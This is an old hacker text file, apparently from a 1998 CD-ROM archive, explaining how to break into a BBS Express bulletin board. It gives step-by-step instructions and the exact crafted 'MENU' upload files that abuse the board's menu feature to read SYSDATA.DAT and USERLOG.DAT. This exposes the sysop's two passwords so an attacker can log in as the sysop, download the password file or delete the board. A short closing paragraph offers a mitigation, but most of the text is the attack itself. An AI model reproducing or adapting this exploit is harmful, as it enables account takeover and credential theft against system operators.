home *** CD-ROM | disk | FTP | other *** search
/ The Hacker's Encyclopedia 1998 / hackers_encyclopedia.iso / hacking / bbs / expbreak.doc < prev    next >
Encoding:
Text File  |  2003-06-11  |  4.4 KB  |  342 lines
  1. Text
  2. &00
  3.  <><><><><><><><><><><><><><><><><><><>
  4.  <>                                  <>
  5.  <>   Breaking into an Express BBS   <>
  6.  <>                                  <>
  7.  <> Broght to you from [_The_Piper_] <>
  8.  <>                                  <>
  9.  <>   And the S.O.D. BBS Network     <>
  10.  <>                                  <>
  11.  <> Distributed by Fawlty Towers BBS <>
  12.  <>                                  <>
  13.  <> 818-36o-o631 20Megs 3/12/2400bps <>
  14.  <>                                  <>
  15.  <><><><><><><><><><><><><><><><><><><>
  16.  
  17.  
  18.      If you have high enough access on
  19. any BBS Express BBS you can get the
  20. Sysop's password without any problems
  21. and be able to log on as him and do
  22. whatever you like. Download the Pass
  23. file, delete the whole BBS, anything.
  24. Its all a matter of uploading a text
  25. file and d/ling it from the BBS. You
  26. must have high enough access to see new
  27. uploads to do this. If you can see a
  28. file you just uploaded you have the
  29. ability to break into the BBS in a few
  30. easy steps.
  31.  
  32.      Why am I telling everyone this
  33. when I run BBS Express myself?
  34. Well there is one way to stop this from
  35. happening and I want other Sysops to be
  36. aware of it and not have it happen to
  37. them.
  38.  
  39.      Breaking in is all based on the
  40. MENU function of BBS Express. Express
  41. will let you create a menu to display
  42. different text files by putting the
  43. word MENU at the top of any text file
  44. and stating what files are to be
  45. displayed. But due to a major screw up
  46. by Mr. Ledbetter you can use this MENU
  47. option to display the USERLOG and the
  48. Sysop's Passwords or anything else you
  49. like. I will show you how to get the
  50. Sysop's pass and therefore log on as
  51. the Sysop.
  52.  
  53.      BBs Express Sysop's have 2
  54. passwords. One like everyone else gets
  55. in the form of X1XXX, and a Secondary
  56. password to make it harder to hack out
  57. the Sysops pass. The Secondary pass is
  58. found in a file called SYSDATA.DAT.
  59. This file must be on drive 1 and is
  60. therefore easy to get. All you have to
  61. do is upload this simple Text file:
  62.  
  63.  
  64. MENU
  65. 1
  66. D1:SYSDATA.DAT
  67.  
  68.  
  69. [1] Ripoff time!
  70.  
  71.  
  72. after you upload this file you d/l it
  73. non-Xmodem. Stupid Express thinks it is
  74. displaying a menu and you will see
  75. this:
  76.  
  77. [1] Ripoff time!
  78.  
  79.   Selection [0]:
  80.  
  81. Just hit 1 and Express will display the
  82. SYSDATA.DAT file. It will look like
  83. this:
  84.  
  85.   
  86.        
  87.   SYSOPPASS
  88.  
  89.  
  90.  
  91.  D1:USERLOG.D
  92. AT
  93.  
  94.  
  95.  
  96.  
  97.  
  98.  
  99.  
  100.  
  101.  
  102.  
  103.  
  104.  
  105.  
  106.  
  107.  D1:USERLOG.IDX
  108.  
  109.  
  110.  
  111.  
  112.  
  113.  
  114.  
  115.  
  116.  
  117.  
  118.  
  119.  
  120.  
  121.  
  122.  
  123.  D1:
  124.  
  125.  
  126.  
  127.  
  128.  
  129.  
  130.  
  131.  
  132.  
  133.  
  134. D6:HELP>
  135.  
  136.  
  137.  
  138.  
  139.  
  140.  
  141.  
  142.  
  143.  
  144.  
  145.  
  146.  
  147.  
  148.  
  149.  
  150.  
  151.  
  152.  
  153.  
  154.  
  155.  
  156.  D8:LOG.
  157.  
  158.  
  159.  
  160.  
  161.  
  162.  
  163.  
  164.  
  165.  
  166.  
  167.  
  168.  
  169.  
  170.  
  171.  
  172.  
  173.  
  174.  
  175.  
  176.  
  177.  
  178.  
  179. DDS0000011111000000000000000000001
  180.  
  181.  
  182.  
  183.  
  184.  
  185.  
  186.  
  187.  
  188.  
  189.  D6:UP>ES>
  190.  
  191.  
  192. D6:DOWN>>
  193.  
  194.  
  195.  D8:
  196. DOWN>
  197.  
  198.  
  199.  
  200.  
  201. D8:
  202.  
  203.  
  204.  
  205.  
  206.  
  207.  
  208.  
  209.  
  210.  
  211.  
  212.  
  213.  
  214.  
  215.  
  216.  
  217.  
  218.  
  219.  
  220.  
  221.  
  222.  
  223.  
  224.  
  225.  
  226.  
  227.  
  228.  
  229.  
  230.  
  231.  
  232.  
  233.  
  234.  
  235.  
  236.  
  237.  
  238.  
  239.  
  240.  
  241.  
  242.  
  243.  
  244.  
  245.  
  246.  
  247.  
  248.  
  249.  
  250.  
  251.  
  252.  
  253.  
  254.  
  255.  
  256.  
  257.  
  258.  
  259.  
  260.  
  261.  
  262.  
  263.  
  264.  
  265.  
  266. SYSOPPASS is where the Sysop's
  267. Secondary pass will be. 
  268. D1:USERLOG.DAT is where you will find
  269. the name and Drive number of the
  270. USERLOG.DAT file. The Sysop might have
  271. renamed this file or put it in a
  272. Subdirectory or even on a different
  273. drive. I Will Assume he left it as
  274. D1:USERLOG.DAT. The other parts of this
  275. file tell you where the .HLP screens
  276. are and where the LOG is saved and all
  277. the Download path names.
  278.  
  279. Now to get the Sysop's primary pass you
  280. upload a text file like this:
  281.  
  282.  
  283. MENU
  284. 1
  285. D1:USERLOG.DAT
  286.  
  287. [1] Breaking into Bedwetter's BBS
  288.  
  289.  
  290. Again you then d/l this file non-Xmodem
  291. and you will see:
  292.  
  293. [1] Breaking into Bedwetter's BBS
  294.  
  295.    Selection [0]:
  296.  
  297. You then hit 1 and the long
  298. USERLOG.DAT file comes flying at you.
  299. The Sysop is the first entry in this
  300. very long file so it is easy. You will
  301. see:
  302.  
  303.  
  304. SYSOP'S NAME         X1XXX
  305.  
  306.  
  307. THE   
  308. CITY  
  309.  CA 000-000-000012/23/57 |  '
  310.  
  311.  
  312.  
  313.  ' 
  314.  
  315.  
  316. X1XXX is the Sysops Primary pass word.
  317.  
  318.  
  319. You now can call back as the Sysop as
  320. you have his 2 passwords.
  321.  
  322.  
  323.      There is only one easy way out of
  324. this that I can think of, and that is
  325. to make all new uploads go to SYSOP
  326. level (Level 9) access only. This way
  327. nobody can pull off what I just
  328. explained.
  329.  
  330.      I feel this is a major Bug on Mr.
  331. Ledbetter's part. I just don't know why
  332. no one had thought of it before.
  333. I would like to give credit to 
  334. Redline for the message he left on
  335. Modem Hell telling about this problem,
  336. and also to Unka for his ideas and
  337. input about correcting it.
  338.  
  339. This has been brought to you from
  340. [_The_Piper_] and the S.O.D. BBS
  341. Network!
  342.